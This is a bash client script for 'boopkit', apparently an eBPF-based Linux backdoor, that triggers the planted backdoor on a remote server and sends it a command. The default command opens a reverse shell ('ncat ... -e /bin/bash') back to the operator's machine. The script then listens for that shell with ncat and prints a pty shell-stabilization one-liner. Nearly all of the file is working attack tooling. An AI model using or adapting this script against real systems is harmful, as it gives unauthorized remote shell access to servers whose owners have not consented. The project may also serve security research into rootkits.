#!/bin/bash
# Copyright © 2022 Kris Nóva <kris@nivenly.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ███╗   ██╗ ██████╗ ██╗   ██╗ █████╗
# ████╗  ██║██╔═████╗██║   ██║██╔══██╗
# ██╔██╗ ██║██║██╔██║██║   ██║███████║
# ██║╚██╗██║████╔╝██║╚██╗ ██╔╝██╔══██║
# ██║ ╚████║╚██████╔╝ ╚████╔╝ ██║  ██║
# ╚═╝  ╚═══╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═╝

# [Remote address]
#
# This is the boopscript (public) address of
# the server running boopkit.
RHOST=${RHOST:-"127.0.0.1"}
RPORT=${RPORT:-"22"}

# [Local address]
#
# This is the local (public) address of
# the machine that boopkit will call back to.
#
# Boopkit hard-codes port "3535" for the callback!
LHOST=${LHOST:-"127.0.0.1"}
LPORT=${LPORT:-"3535"}

# SINGLE_SYN will run the boopkit-boop client
# in payload only mode. This means we will
# try to attach our RCE as a payload in a single
# SYN packet!
SINGLE_SYN=0

# [Reverse shell]
#
# Use netcat to listen locally for a shell.
NCAT="/usr/bin/ncat"
# After we have sent our command back over boopkit's
# protocol on 3535 we need a 2nd port to listen against.
NCATLISTENPORT="3545"

# Remote Command Execution
#
# The command to run on the server!
# ================================================
RCE=${RCE:-"ncat ${LHOST} ${NCATLISTENPORT} -e /bin/bash &"}
# ================================================

# Trigger is used to fire the eBPF probe on the server.
trigger(){
    sleep 1
    boopkit-boop \
      -lhost $LHOST \
      -lport $LPORT \
      -rhost $RHOST \
      -rport $RPORT \
      -c "$RCE" ${P}
}

# Check for permissions to host a local socket.
if [ "$EUID" -ne 0 ]; then
  echo "Permission denied."
  exit
fi

P=""
if [ "$SINGLE_SYN" -ne 0 ]; then
  P="-p"
fi

# Right away trigger the backdoor on the server
trigger &

# Also begin listening for the return RCE
#
# Note: this is only required if you are performing
# a reverse shell!
#
# Remind the user of how to use shell stabilization
echo ""
echo "python -c \"import pty; pty.spawn('/bin/bash')\""
echo ""
${NCAT} -lvp ${NCATLISTENPORT}
